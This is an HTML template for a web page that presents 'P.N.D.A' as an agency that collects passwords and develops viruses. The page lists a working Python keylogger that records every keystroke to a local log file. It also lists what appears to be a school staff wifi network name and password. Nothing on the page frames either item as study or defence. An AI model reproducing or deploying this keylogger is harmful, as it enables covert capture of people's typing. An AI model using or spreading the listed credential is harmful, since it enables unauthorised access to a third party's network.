<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>PNDA page</title>
    <link
      rel="stylesheet"
      href="{{ url_for('static', filename='styles/pnda.css') }}"
    />
    <link
      rel="icon"
      href="{{ url_for('static', filename='images/favicon.ico') }}"
    />
  </head>
  <body>
    <header>
      <h1>P.N.D.A</h1>
      <nav>
        <ul>
          <li>
            <a href="{{ url_for('views.login') }}"> Mate Transport </a>
          </li>
          <li>
            <a href="{{ url_for('views.home') }}">Home</a>
          </li>
          <li><a href="#">P.N.D.A</a></li>
        </ul>
      </nav>
    </header>
    <h1>P.N.D.A official page</h1>
    <section id="intro">
      <h2>Intro</h2>
      <p>
        The PNDA(Pled National Defence Agency) is a company owned by Mate that
        collects passwords and develops viruses. On this page you can find all
        the passwords we've collected and the viruses we've developed.
      </p>
    </section>
    <section>
      <h2>viruses</h2>
      <ul>
        <li>
          <h3>keylogger</h3>
          <div class="codewrapper">
            <pre><code>
from pynput import keyboard

def on_press(key):
    try:
        with open("key.log", "a") as f:
            f.write(f"Key pressed: {key.char}\n")
    except AttributeError:
        with open("key.log", "a") as f:
            f.write(f"Special key pressed: {key}\n")

# Collect events until released
with keyboard.Listener(on_press=on_press) as listener:
    listener.join()
            </code></pre>
          </div>
        </li>
      </ul>
    </section>
    <section id="passwords">
      <h2>Passwords</h2>
      <ul>
        <li>
          <h3>European school staff wifi</h3>
          <p>Name: ES_Staff</p>
          <p>Password: decfvrgtb369!</p>
        </li>
      </ul>
    </section>
  </body>
</html>
